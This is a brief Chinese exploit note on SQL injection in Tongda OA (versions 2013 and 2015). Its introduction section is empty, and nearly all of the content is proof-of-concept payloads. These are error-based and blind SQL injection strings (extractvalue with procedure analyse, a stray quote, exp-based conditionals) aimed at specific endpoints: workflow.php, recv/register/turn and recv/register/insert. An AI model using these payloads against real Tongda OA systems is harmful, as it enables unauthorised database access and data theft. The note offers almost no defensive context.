

通达oa sql注入¶

一、漏洞简介¶

二、漏洞影响¶

2013、2015版本

三、复现过程¶

poc

http://0-sec.org/general/mytable/intel_view/workflow.php?MAX_COUNT=15 procedure analyse(extrac
tvalue(rand(),concat(0x3a,database())),1)&amp;TYPE=3&amp;MODULE_SCROLL=false&amp;MODULE_ID=55&amp;
MODULE_ID=Math.random
http://0-sec.org/general/document/index.php/recv/register/turn

post(_SERVER=&amp;rid=1')
http://0-sec.org/general/document/index.php/recv/register/insert

post:   
title)values("'"^exp(if(1%3d2,1,710)))#=1&amp;_SERVER